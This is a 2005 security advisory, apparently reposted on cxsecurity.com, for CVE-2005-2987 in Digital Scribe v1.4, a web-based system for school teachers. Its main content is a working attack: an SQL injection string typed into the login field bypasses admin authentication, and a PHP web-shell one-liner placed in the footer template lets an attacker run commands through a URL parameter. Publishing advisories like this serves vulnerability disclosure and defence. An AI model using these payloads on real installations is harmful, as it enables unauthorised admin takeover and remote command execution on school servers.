Digital Scribe v1.4 Login Bypass / SQL injection / remote code execution

2005.09.17
Credit: retrogod aliceposta it
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2005-2987
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Digital Scribe v1.4 Login Bypass / SQL injection / remote code execution software: site: http://www.digital-scribe.org/ description: "Teachers have full control through a web-based interface. Designed for easy installation and even easier use, the Digital Scribe has been used in thousands of schools. No teacher or IT Personnel needs to know any computer languages in order to install and use this intuitive system. 1) Login Bypass / SQL Injection ************************************************ login as admin typing: login: " or isnull(1/0) /* password: [whatever] 2) remote code execution ******************************************************* now you can edit template and leave a backdoor on target system: at the end of the footer try this: <?php error_reporting(0); system($HTTP_GET_VARS[cmd]); ?> then you can launch commands: http://[target]/[path_to_dscribe]/index.php?cmd=[some_command] rgod site: http://rgod.altervista.org email: retrogod at aliceposta it original advisory: http://rgod.altervista.org/dscribe14.html ************************************************************************ ********


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top